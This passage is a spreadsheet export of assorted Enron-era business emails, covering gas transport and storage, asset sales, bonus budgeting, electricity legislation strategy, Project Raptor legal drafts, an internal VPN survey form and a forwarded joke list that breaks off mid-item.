	From:  Kate Fraser                           08/22/2000 10:53 AM_x000D_
	_x000D_
_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc: Kyle Etter/HOU/ECT@ECT, Sandra F Brawner/HOU/ECT@ECT _x000D_
Subject: Transport Model for New Deals_x000D_
_x000D_
_x000D_
Scott,_x000D_
_x000D_
Attached below is the transport model I have been using for new deals.  It is _x000D_
set up right now for the Cranberry deal, but Kyle can show you how to modify _x000D_
it for any new deal.  Obviously, I have not been relying heavily on the _x000D_
extrinsic values this model produces._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 08:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'enron@eott.com'})</t>
  </si>
  <si>
    <t>Re: Azurix/Enel</t>
  </si>
  <si>
    <t xml:space="preserve">Right now, we are concentrating on disposing of all Azuriz assets other than _x000D_
Wessex and Buenos Aires.  John Garrison and Michael Anderson are handling _x000D_
getting CA's executed and books out to the respective parties.  Just contact _x000D_
Michael directly about getting this kicked-off.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Riccardo_Bortolotti%ECT%ENRON@eott.com on 04/26/2001 12:49:01 PM_x000D_
To: Stanley.Horton%enron.com%EOTT%ENRON@EOTT.COM_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Azurix/Enel_x000D_
_x000D_
_x000D_
_x000D_
One way to proceed could be  that I try to have an informal chat with Mr._x000D_
Barozzi ( Head of Strategic Planning ) to see if they are interested to_x000D_
talk, if the answer is Yes probably have them sign a confidentiality and_x000D_
then either meet them with you or your people or send them information,_x000D_
whatever you think makes more sense to begin with ._x000D_
_x000D_
_x000D_
open for any suggestion ._x000D_
_x000D_
_x000D_
regards ._x000D_
_x000D_
_x000D_
_x000D_
 R_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stanley.Horton@enron.com on 25/04/2001 17:13:52_x000D_
_x000D_
To:   Riccardo Bortolotti@ECT@ENRON_x000D_
cc:_x000D_
_x000D_
Subject:  Re: Azurix/Enel_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Yes.  Let me know about follow=up plans._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Riccardo_Bortolotti%ECT%ENRON@eott.com on 04/25/2001 08:34:33 AM_x000D_
_x000D_
To:   Stanley_Horton%Enron.com%Eott@EOTT.COM,_x000D_
      Mark_Metts%EnronXGate@EOTT.COM_x000D_
cc:   Michael_R_Brown%ECT@EOTT.COM, Eric_Shaw%ECT%ENRON@eott.com_x000D_
_x000D_
Subject:  Azurix/Enel_x000D_
_x000D_
_x000D_
Stan + Mark,_x000D_
_x000D_
as you are probably aware Enel is actively looking at acquiring water_x000D_
businesses, particularly, but not only, in the UK ._x000D_
_x000D_
They are also generally interested in opportunities in South America ._x000D_
_x000D_
We are always looking at things that could attract Enel' s interest in_x000D_
order to help us get our hands on some power and potentially gas positions_x000D_
in Italy ._x000D_
_x000D_
Moreover, Enel is cash rich and has proven to be a very generous buyer,_x000D_
when it comes to acquisitions in areas of business ( gas, water and_x000D_
telecoms ) that can help them to fulfil their vision to become  a multi_x000D_
utility ._x000D_
_x000D_
 I have got some decent contacts at the decision making level . Would you_x000D_
be interested in discussing a potential approach ?_x000D_
_x000D_
_x000D_
_x000D_
       R_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 23:40:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Tell us what do you think of accessing applications with=_x000D_
out requiring VPN&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;STYLE&gt;TD{FONT-SIZE: 10pt; COLOR: black; BA=_x000D_
CKGROUND-COLOR: white}&lt;/STYLE&gt;&lt;BODY&gt;&lt;table width=3D100% border=3D0 cellspac=_x000D_
ing=3D0 cellpadding=3D0&gt;&lt;tr&gt;&lt;td height=3D96 width=3D'22%'&gt;&lt;img src=3D'http:=_x000D_
//isc.dev.corp.enron.com/surveyVPN/images/index_r1_c1_r1_c1.gif' width=3D'5=_x000D_
29' height=3D'117'&gt;&lt;/td&gt;&lt;td height=3D'96' width=3D'100%' background=3D'http=_x000D_
://isc.dev.corp.enron.com/surveyVPN/images/index_r1_c1_r1_c2.gif'&gt;&amp;nbsp;&lt;/t=_x000D_
d&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D'100%' border=3D'0' cellspacing=3D'0' cellpad=_x000D_
ding=3D'0' height=3D'343'&gt;&lt;tr&gt;&lt;td&gt;&lt;form name=3D'SurveyVPNForm' method=3D'po=_x000D_
st' action=3D'http://isc.enron.com/surveyVPN/SurveyVPNProcess.asp'&gt;Now that=_x000D_
 you have access to the following applications without requiring VPN access=_x000D_
...&lt;br&gt;&lt;br&gt;&lt;ul&gt;&lt;li type=3D'disc'&gt; Outlook Web Access (email and calendar)&lt;b=_x000D_
r&gt;&lt;li&gt; PEP&lt;br&gt;&lt;li&gt; XMS (Expense Reporting application)&lt;br&gt;&lt;br&gt;And, COMING S=_x000D_
OON...&lt;li&gt; eHROnline (year-end)&lt;li&gt; Benefits Election (Oct. 29, 2001)&lt;li&gt; E=_x000D_
lectronic Pay Stubs (year-end), and&lt;li&gt; Much More,&lt;/ul&gt;through the ClickAtH=_x000D_
ome Portal and the Internet, do you still believe you need remote access th=_x000D_
rough VPN from home to Enron networks (must have a valid business reason wi=_x000D_
th supervisor approval and a monthly cost)?&lt;br&gt;&lt;br&gt;&lt;input type=3D'radio' na=_x000D_
me=3D'answer1' value=3D1&gt;&amp;nbsp;YES&lt;input type=3D'radio' name=3D'answer1' va=_x000D_
lue=3D0&gt;&amp;nbsp;NO&lt;input type=3D'radio' name=3D'answer1' value=3D-1&gt;&amp;nbsp;NOT=_x000D_
 SURE&lt;br&gt;&lt;b&gt;&lt;i&gt;Please answer this survey from your computer at work, not vi=_x000D_
a Outlook Web Access.&lt;/i&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;input type=3D'submit' name=3D'btnSubm=_x000D_
it' value=3D'Submit'&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/BODY&gt;&lt;/HTML&gt;</t>
  </si>
  <si>
    <t>Wed, 2 Feb 2000 00:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.kinsey@enron.com'})</t>
  </si>
  <si>
    <t>January 2000 Withdrawals from Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Vonda,_x000D_
Attached is the worksheet showing your withdrawals for the month of January _x000D_
2000.  Let me know if you have any questions.  _x000D_
Lisa Kinsey_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 09:54:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Griffith Power Plant</t>
  </si>
  <si>
    <t>_x000D_
fyi,_x000D_
_x000D_
ds_x000D_
 -----Original Message-----_x000D_
From: 	Sayegh, Angela  _x000D_
Sent:	Thursday, July 05, 2001 11:36 AM_x000D_
To:	DL-ETS Gas Controllers; Marshall, George; Poole, Kenneth_x000D_
Subject:	Griffith Power Plant_x000D_
_x000D_
_x000D_
I received a call from Ben Tanner saying that 2 discrete points have been discovered to not be working at Griffith Power Plant (Citizens)._x000D_
_x000D_
CITZ.1001	General Alarm 2" Rotary Meters_x000D_
CITZ.1002	General Station Alarm_x000D_
_x000D_
They are working to see what is going on and will let us know when they are working._x000D_
_x000D_
Also, George Marshall found out that the Accums for the 2" runs on both the TW and El Paso side do not appear to be resetting at gas day.  Calls have been place to Citizens to follow up on this._x000D_
_x000D_
_x000D_
Let me know if you have any questions,_x000D_
_x000D_
Angela</t>
  </si>
  <si>
    <t xml:space="preserve">I'll have to ask Neil for Michael's SS#.  I don't have it on me._x000D_
_x000D_
I know Neil's boss and his boss' boss will have parties.  I think one in on _x000D_
the 16th and the other on the 30th (stupid day for a party).  Are those good _x000D_
days for you? I just can't get interested in going to the Enron parties - too _x000D_
many people.  We could really stand some shopping time (bah humbug), also._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Brashear, Charlotte" &lt;cbrashear@velaw.com&gt; on 11/29/2000 09:50:45 AM_x000D_
To: "Mann Kay (E-mail)" &lt;kmann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
   When you have a chance, please send me Michael's Social Security_x000D_
number._x000D_
_x000D_
   I'll be glad when you and Neil start going to some Christmas_x000D_
parties._x000D_
_x000D_
   Thanks.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_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 09:29:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'billy.lemmons@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'louise.kitchen@enron.com'})</t>
  </si>
  <si>
    <t>RE: Budget and A&amp;A allocations</t>
  </si>
  <si>
    <t>We're looking at this as we speak, along with the PRC.  Don't want to repeat the nightmare._x000D_
_x000D_
I want to put as much discretion as possible in the hands of the business units.  The "strawman" we're looking at would have a very basic matrix, with a discretionary business unit component (that really gives the OTC's the freedom to do what they want).  _x000D_
_x000D_
I think we need the basic matrix to avoid EEOC problems, and to not drive a/a's toward wanting to work in just one part of the organization._x000D_
_x000D_
Billy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Friday, October 05, 2001 10:27 AM_x000D_
To:	Sherriff, John; Lemmons Jr., Billy_x000D_
Subject:	RE: Budget and A&amp;A allocations_x000D_
_x000D_
I know that's why I am hoping/assuming we are not going that way. _x000D_
_x000D_
I'll assume we are off standards unless you tell me otherwise._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sherriff, John  _x000D_
Sent:	Friday, October 05, 2001 10:25 AM_x000D_
To:	Kitchen, Louise; Lemmons Jr., Billy_x000D_
Subject:	RE: Budget and A&amp;A allocations_x000D_
_x000D_
We haven't use the standard formula's here for several years._x000D_
_x000D_
John_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	05 October 2001 16:16_x000D_
To:	Sherriff, John; Lemmons Jr., Billy_x000D_
Subject:	Budget and A&amp;A allocations_x000D_
_x000D_
So here's my question.  Is there any possibility that we will be not doing the standard bonusses (which have caused huge problems in the US in the last years) at the end of this or next year._x000D_
_x000D_
I need to know whether to budget the bonus numbers/aa allocations for 2002._x000D_
_x000D_
If you haven't thought of this please do as I really do not think its appropriate to go with the nightmare from last year.</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 00:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: new contract</t>
  </si>
  <si>
    <t xml:space="preserve">My copy shows long term comp on the exhibit under "Grant Award".  And yes, _x000D_
the date will be revised._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Schroeder@ECT_x000D_
04/14/2000 03:31 AM_x000D_
To: Steven J Kean/HOU/EES@EES, Mark Frevert/LON/ECT@ECT_x000D_
cc:  _x000D_
Subject: new contract_x000D_
_x000D_
The contract Mark gave me to review yesterday only covers monthly salary.  I _x000D_
had expected there to be some discussion/reference to long-term comp plan.  _x000D_
Mark had mentioned that what he gave me did not deal with certain non-compete _x000D_
payments owed to me in 2000, so I am not looking for that, but I did think he _x000D_
had said that there was something in the doucment re:long-term, which I _x000D_
cannot find.  Please advise if I am missing something.  I will withhold other _x000D_
comments for now, except to note that the draft was dated 13 March, and had a _x000D_
14 day period before expiry (now passed), and will assume that that is an _x000D_
irrelevancy.  Look forward to hearing from one of you. mcs_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2000 08:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jwhited@columbiaenergygroup.com', 'chris.germany@enron.com', 'scott.goodell@enron.com'})</t>
  </si>
  <si>
    <t>Allied Signal</t>
  </si>
  <si>
    <t xml:space="preserve">Per my voicemail message to John._x000D_
_x000D_
I talked to Stacy Miller at TCO to better understand the SIT limitations._x000D_
_x000D_
TCO has something called TFE (Total Firm ???). Plants can burn up to this _x000D_
amount and plus 1.03%._x000D_
_x000D_
Allied has the following FTS capacity;_x000D_
_x000D_
39095 50075_x000D_
62672 3333_x000D_
_x000D_
Total 53408_x000D_
 x 1.03_x000D_
_x000D_
Total allowed without penalty 55,010_x000D_
_x000D_
Stacy, Cindy, Steve please verify this amount._x000D_
_x000D_
If Allied burns above this amount then they will be subject to penatly, even _x000D_
if SIT withdrawal is allowed. TCO has started to enforce this penatly again._x000D_
_x000D_
Stacy did say that we could true-up the next day to avoid the penatly, like _x000D_
we do for the Cogen's. However, you still need capacity above 55,010 to meet _x000D_
the burns. That is why Cindy was letting Allied use its SIT withdrawal and _x000D_
Aristech's contract. Unfortunately, this was cut by TCO by about 50%._x000D_
_x000D_
Not sure what you want to do John. You are welcome to talk to Chris and Scott _x000D_
about using Enron's Capacity... but ours is maxed out for the Cogen's in that _x000D_
area. International Paper may have some idle capacity, you would have to talk _x000D_
to Amy at Alliance 502-426-4500 x7372._x000D_
_x000D_
This brings up another question. When will Allied be transferred to another _x000D_
fuel manager?? Lee Tippet said it would be effective April 1st. If it is not _x000D_
April 1st, Allied needs to sign the piece of paper to allow Enron access to _x000D_
perform Allied's nominations. If Allied still refuses this to do it, you will _x000D_
need someone at CES to perform these nominations. I will not have access to _x000D_
my CES account on April 1st to do Allied's nominations._x000D_
_x000D_
Thanks for your patience and understanding._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Mar 2000 06:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Japanese Regulatory Environment</t>
  </si>
  <si>
    <t xml:space="preserve">In the West, the relationship between regulators and businesses is based on _x000D_
control (and sometimes conflict -- somewhat like prison guard vs. inmates).  _x000D_
Nevertheless, in Japan, it has until recently been based on cooperation (more _x000D_
like a coach and team)._x000D_
_x000D_
The Japanese understand that this relationship may not be the best for the _x000D_
nation as a whole and have begun changing it.  This process is disconcerting _x000D_
and has powerful emotions attached to it._x000D_
_x000D_
I thought you might find this article interesting, since it shows some of the _x000D_
complexities inherent in this change that might not be readily apparent to _x000D_
Westerners._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
_x000D_
Eugenio_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Jun 2000 13:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Federal Electricity Restructuring Update</t>
  </si>
  <si>
    <t xml:space="preserve">Ginger:  would you please distribute the following memo to the Government _x000D_
Affairs group.  Thank you!_x000D_
_x000D_
Congress continues to advance the Electricity Restructuring Legislative _x000D_
debate.  On Tuesday, June 20th, the Senate Energy Committee plans to mark-up _x000D_
and pass Senator Gorton's Reliability bill including the consensus state _x000D_
savings clause language.  Attached below (attachment 6-17 jt.st.wpd) is the _x000D_
46 page joint Senate staff draft which represents agreement in many areas, _x000D_
but the differences remain significant.  No agreement was reachable at this _x000D_
time in Committee on the extent of FERC jurisdiction to prevent unreasonable _x000D_
differences between wholesale and retail service nor reached on the RPS.   _x000D_
Although the 46 page draft includes language on PURPA, Reciprocity ,Consumer _x000D_
Protection, Interconnection, etc.; currently only two Senators support the _x000D_
additional language included in the 46 pages; thus, the only chance of moving _x000D_
through the Senate Energy Committee this year is to pass Reliability-only _x000D_
now.  With the make-up of the Senate Energy Committee, our strategy is "to do _x000D_
no harm" in committee thus, making the reliability language-only option _x000D_
acceptable as a means to an end.  Enron does support the Reliability bill but _x000D_
we will insist on adding transmission access and functional separation _x000D_
language later in the process while EEI will insist on adding PUHCA while _x000D_
APPA will insist on adding Private Use (thus, we can see what the final _x000D_
consensus will look like; plus we have been involved in drafting the _x000D_
consensus in all these provisions.....but timing and sequence are crucial.)_x000D_
_x000D_
It might be helpful to remind everyone that the bills leading up to the _x000D_
Energy Policy Act of 1992 as passed by the Committees were also amended in _x000D_
Conference since it was impossible to garner the necessary Committee votes or _x000D_
survive a Senate filibuster with any Committee-included wheeling language.  _x000D_
Transmission wheeling/ access language was successfully added in Conference.  _x000D_
Thus, the sequence of adding our necessary provisions remains key to a _x000D_
successful strategy then as it does now._x000D_
_x000D_
Also attached is Chairman Bliley's Reliability and Transmission discussion _x000D_
draft (section by section, summary and 005_PDF).  This is the foundation from _x000D_
which he is willing to add additional consensus amendments. From Enron's view _x000D_
,this foundation draft is our exact wish list to clarify FERC jurisdiction _x000D_
over both bundled and unbundled transmission (although we have suggested a _x000D_
few technical drafting points which have already been conveyed to staff.)  It _x000D_
is important for all of us to convey our support for this draft as the _x000D_
essential foundation for the bill.  Mark-up  will likely be scheduled to _x000D_
occur during  the week of June 26th._x000D_
_x000D_
It is important to note that Subcommittee Chairman Barton is philosophically _x000D_
opposed to the Bliley/Enron "pro-FERC" approach.  As such, he has asked Texas _x000D_
PUC Chairman Pat Wood and Oklahoma Corporate Commission Chairwoman Denise _x000D_
Bode to draft a compromise to lighten the FERC authority in favor of a more _x000D_
Regional Approach.  I just got off the phone with Pat who walked me through _x000D_
the draft he was submitting this evening to Barton (once it is officially _x000D_
transmitted, I will be able to get a copy to you, likely on Monday or _x000D_
Tuesday.)  From Pat's description, we should be able to be supportive since _x000D_
he shares our views about  wholesale markets needing federal authority.   He _x000D_
discussed a draft that mandates RTO participation, a seven point mandatory  _x000D_
RTO test  filed at FERC in 60 days after enactment, Ratemaking established by _x000D_
the state but allowing FERC appeal, allowing FERC appeal if 2/3rd's _x000D_
disagree,  State authority but also ongoing FERC authority with an expedited _x000D_
dispute resolution process.  The seven point mandatory filing details are 1.  _x000D_
full wholesale competition under the same terms, rates and conditions; 2. RTO _x000D_
sole functional control of transmission; 3. functional separation of _x000D_
generation from transmission; 4. curtailment on non-discriminatory basis; 5. _x000D_
all transmission uses disclosed and transparent (889); 6. constant assessment _x000D_
of construction needs; and 7.  remedy and emergency authority for dispute _x000D_
resolution.  He mentioned Denise's insistence for interconnection on a _x000D_
non-discriminatory basis which he feels is adequately addressed in their _x000D_
draft._x000D_
_x000D_
From Pat's discussions with Reliant on his draft, they again spoke in support _x000D_
of Enron's transmission open access goals.  TXU remains concerned that ERCOT _x000D_
will be pulled under FERC jurisdiction in the draft.  But, it is Pat's view _x000D_
that this already has happened under the state law._x000D_
_x000D_
Our goal next week is to lock-in bipartisan House Committee support and House _x000D_
Leadership support for the mark-up plus tighten the mark-up process so it is _x000D_
transparent to all; plus to pass the Senate Committee bill.   A bill to meet _x000D_
our established goals is still doable this year.  My strategy was always _x000D_
based upon the necessity to lead with the reliability language in order  to _x000D_
create a legislative vehicle for us to include our non-discriminatory _x000D_
transmission access provisions.    Please call should you need clarification _x000D_
or have questions.  Many thanks for your continued support._x000D_
_x000D_
 _x000D_
_x000D_
 - sectionbysection.wpd - summarydoc.wpd - 005_.PDF_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 02:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Project Raptor III (2 of 2 emails)</t>
  </si>
  <si>
    <t xml:space="preserve">please print item 14 only_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 08/29/2000 09:31 AM -----_x000D_
_x000D_
	Carol St Clair_x000D_
	08/29/2000 08:14 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Mary _x000D_
Cook/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Project Raptor III (2 of 2 emails)_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 08/29/00 08:11 AM -----_x000D_
_x000D_
	"Curry, Alicia" &lt;acurry@velaw.com&gt;_x000D_
	08/28/00 01:59 PM_x000D_
		 _x000D_
		 To: "Kopper, Michael (Enron)" &lt;michael.kopper@enron.com&gt;, "Tiller, AnnMarie _x000D_
(Enron)" &lt;annmarie.tiller@enron.com&gt;, "Schnapper, Barry (Enron)" _x000D_
&lt;barry.schnapper@enron.com&gt;, "St. Clair, Carol (Enron)" _x000D_
&lt;carol.st.clair@enron.com&gt;, "Sefton, Scott (Enron)" &lt;scott.sefton@enron.com&gt;, _x000D_
"'kenton@rlf.com'" &lt;kenton@rlf.com&gt;, "'dj@lordspv.com'" &lt;dj@lordspv.com&gt;, _x000D_
"'aw@lordspv.com'" &lt;aw@lordspv.com&gt;, "'aroberts@wilmingtontrust.com'" _x000D_
&lt;aroberts@wilmingtontrust.com&gt;, "'martha_stuart@kirkland.com'" _x000D_
&lt;martha_stuart@kirkland.com&gt;, "Chandler, Trina" &lt;tchandler@velaw.com&gt;, _x000D_
"'kevin.d.jordan@enron.com'" &lt;kevin.d.jordan@enron.com&gt;, "Astin, Ronald T." _x000D_
&lt;RAstin@velaw.com&gt;, "Spradling, Mark" &lt;MSpradling@velaw.com&gt;, "Osterberg, _x000D_
Edward" &lt;eosterberg@velaw.com&gt;, "'Anne Yaeger'" &lt;Anne.Yaeger@enron.com&gt;, _x000D_
"'Ian Schachter'" &lt;ian.schachter@us.pwcglobal.com&gt;, "'Michael Edsall'" _x000D_
&lt;michael_edsall@kirkland.com&gt;, "'Brent Vasconcellos'" &lt;bvascon@enron.com&gt;, _x000D_
"'Trushar Patel'" &lt;trushar.patel@enron.com&gt;, "'rsiurek@enron.com'" _x000D_
&lt;rsiurek@enron.com&gt;, "'patty.grutzmacher@enron.com'" _x000D_
&lt;patty.grutzmacher@enron.com&gt;, "'jennifer.stevenson@enron.com'" _x000D_
&lt;jennifer.stevenson@enron.com&gt;, "'simpson@rlf.com'" &lt;simpson@rlf.com&gt;_x000D_
		 cc: "Halbert, Elaine" &lt;ehalbert@velaw.com&gt;_x000D_
		 Subject: Project Raptor III (2 of 2 emails)_x000D_
_x000D_
_x000D_
_x000D_
 Attached please find drafts of the following:_x000D_
_x000D_
1. Security Agreement_x000D_
_x000D_
2. UCC-1 Financing Statements_x000D_
_x000D_
3. Stock Transfer Restriction Letter Agreement_x000D_
_x000D_
4. Roadrunner LLC Agreement_x000D_
_x000D_
5. Bobcat LLC Agreement_x000D_
_x000D_
6. Enron Management Services Agreement_x000D_
_x000D_
7. LJM Management Services Agreement_x000D_
_x000D_
8. Tax Indemnification Agreement_x000D_
_x000D_
9. Certificate of Incumbency of BSCS XXIII, Inc._x000D_
_x000D_
10. Opinion of Vinson &amp; Elkins L.L.P._x000D_
_x000D_
11. Enron Corp. Demand Note_x000D_
_x000D_
12. Confidentiality Agreement_x000D_
_x000D_
13. Peregrine Letter Agreement_x000D_
_x000D_
14. List of Documents_x000D_
_x000D_
&gt; Alicia L. Curry_x000D_
&gt; Vinson &amp; Elkins L.L.P._x000D_
&gt; 2300 First City Tower_x000D_
&gt; 1001 Fannin Street_x000D_
&gt; Houston, Texas 77002-6760_x000D_
&gt; Phone:  713-758-4428_x000D_
&gt; Fax:  713-615-5688_x000D_
&gt; (Licensed in New York only)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; +++++++++++++++++++++++_x000D_
&gt; CONFIDENTIALITY NOTICE_x000D_
&gt; +++++++++++++++++++++++_x000D_
&gt; The information in this email may be confidential and/or privileged._x000D_
&gt; This email is intended to be reviewed by only the individual or_x000D_
&gt; organization named above. If you are not the intended recipient or an_x000D_
&gt; authorized representative of the intended recipient, you are hereby_x000D_
&gt; notified that any review, dissemination or copying of this email and_x000D_
&gt; its attachments, if any, or the information contained herein is_x000D_
&gt; prohibited. If you have received this email in error, please_x000D_
&gt; immediately notify the sender by return email and delete this email_x000D_
&gt; from your system. Thank You_x000D_
&gt;_x000D_
PRIVILEGED AND CONFIDENTIAL:_x000D_
Contains attorney-client communications and/or attorney work product._x000D_
_x000D_
_x000D_
_x000D_
 - Ten.DOC_x000D_
 - Twenty-one A.DOC_x000D_
 - Twenty-two.DOC_x000D_
 - Twenty-four.WPD_x000D_
 - Twelve.DOC_x000D_
 - Fourteen.DOC_x000D_
 - Sixteen.DOC_x000D_
 - Eighteen.DOC_x000D_
 - Nineteen.DOC_x000D_
 - Seventeen.DOC_x000D_
 - Fifteen.DOC_x000D_
 - Thirteen.WPD_x000D_
 - Eleven.DOC_x000D_
 - Twenty-three.DOC_x000D_
 - Twenty-one B.WPD_x000D_
 - Twenty.DOC_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'megan.parker@enron.com', "o'neal.winfree@enron.com"})</t>
  </si>
  <si>
    <t>Republic Royalty 5/00</t>
  </si>
  <si>
    <t xml:space="preserve">This deal was terminated by Nelson Ferries._x000D_
_x000D_
Ami_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 06/28/2000 _x000D_
10:42 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Megan Parker                           06/28/2000 10:28 AM_x000D_
	_x000D_
_x000D_
To: Ami Chokshi/Corp/Enron@ENRON, O'Neal D Winfree/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Republic Royalty 5/00_x000D_
_x000D_
Republic Royalty is one of my CES deals.  They sent me an invoice for May _x000D_
2000 production, but I do not see a deal for May.  Does either of you know if _x000D_
this deal was extended under a new deal number?_x000D_
_x000D_
Megan_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 Jan 2002 11:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Martha Stewart's Redneck Etiquette</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Raquel Nunes-Thomas/USLGN/USLUM/ABB on_x000D_
01/16/2002 01:56 PM ---------------------------_x000D_
|-------------&gt;_x000D_
|(Embedded    |_x000D_
|image moved  |_x000D_
|to file:     |_x000D_
|pic22161.pcx)|_x000D_
|             |_x000D_
|-------------&gt;_x000D_
  &gt;------------------------------------------------------------------------|_x000D_
  |Thomas F Sawyer/USLGN/USLUM/ABB                                         |_x000D_
  |01/16/2002 07:34 AM (Phone: +1 713 821-4100, Dept.: PIPING DESIGN)      |_x000D_
  &gt;------------------------------------------------------------------------|_x000D_
_x000D_
_x000D_
_x000D_
To:   DEBBIE SAWYER &lt;DSAWYER @ alliance-engineering.com&gt;_x000D_
_x000D_
      Debra Cannon/USLGN/USLUM/ABB@ABB_USLUM_x000D_
      lana@plumhoff.com_x000D_
      John Chalmers/USLGN/USLUM/ABB@ABB_USLUM_x000D_
      Randy Hernandez/USLGN/USLUM/ABB@ABB_USLUM_x000D_
      Roy Jeans/USLGN/USLUM/ABB@ABB_USLUM_x000D_
      Raquel Nunes-Thomas/USLGN/USLUM/ABB_x000D_
      Martin Ogg/USLGN/USLUM/ABB@ABB_USLUM_x000D_
      Steve Sawyer &lt;sales@dynatrolUSA.com&gt; @ ABB_US01@ABB_NOTES_x000D_
      adam.shivers@rsli.com_x000D_
      lilshiv03@aol.com_x000D_
      Matt_Shivers@canadalifeus.com_x000D_
      Donald Skidmore/USLGN/USLUM/ABB@ABB_USLUM_x000D_
      Melvin Talley/USLGN/USLUM/ABB@ABB_USLUM_x000D_
      Jerry Whitlow/USLGN/USLUM/ABB@ABB_USLUM_x000D_
Subject:  FW: Martha Stewart's Redneck Etiquette_x000D_
_x000D_
Security Level:?         Internal_x000D_
_x000D_
_x000D_
_x000D_
tips for rednecks_x000D_
_x000D_
1. Never take a beer to a job interview._x000D_
2. Always identify people in your yard before shooting them._x000D_
3. It's tacky to take a cooler to church._x000D_
4. If you have to vacuum the bed, it's time to change the sheets._x000D_
5. Even if you're certain you're included in the will, it's rude to drive_x000D_
the_x000D_
U-Haul to the funeral home._x000D_
_x000D_
DINING OUT:_x000D_
1. When decanting wine from the box, tilt the paper cup and pour slowly so_x000D_
as_x000D_
not to "bruise" the wine._x000D_
2. If drinking directly from the bottle, hold it with your hands._x000D_
_x000D_
ENTERTAINING IN YOUR HOME:_x000D_
1. A centerpiece for the table should never be anything prepared by a_x000D_
taxidermist._x000D_
2. Don't allow the dog to eat at the table, no matter how good his_x000D_
manners._x000D_
_x000D_
PERSONAL HYGIENE:_x000D_
1. While ears need to be cleaned regularly, this should be done in private,_x000D_
using one's OWN truck keys._x000D_
2. Even if you live alone, deodorant isn't a waste of money._x000D_
3. Use of toiletries can only delay bathing a few days._x000D_
4. Dirt and grease under the fingernails is a no-no, as they detract from a_x000D_
woman's jewelry and alter the taste of finger foods._x000D_
_x000D_
DATING (Outside the Family):_x000D_
1. Always offer to bait your date's hook, especially on the 1st date._x000D_
2. Be assertive. Let her know you're interested: "I've been wanting to go_x000D_
out_x000D_
with you since I read that stuff on the bathroom wall 2 years ago"._x000D_
3. Establish with her parents what time she's expected back. Some will say_x000D_
10:00_x000D_
PM, others might say "Monday." If the latter is the answer, it's the man's_x000D_
responsibility to get her to school on time._x000D_
_x000D_
THEATER ETIQUETTE:_x000D_
1. Crying babies should be taken to the lobby and picked up after the_x000D_
movie's_x000D_
ended._x000D_
2. Refrain from talking to characters on the screen. Tests have proven they_x000D_
can't hear you._x000D_
_x000D_
WEDDINGS:_x000D_
1. Livestock is a poor choice for a wedding gift._x000D_
2. Kissing the bride for more than 5 seconds may get you shot._x000D_
3. For the groom, at least, rent a tux. A leisure suit with a cumberbund_x000D_
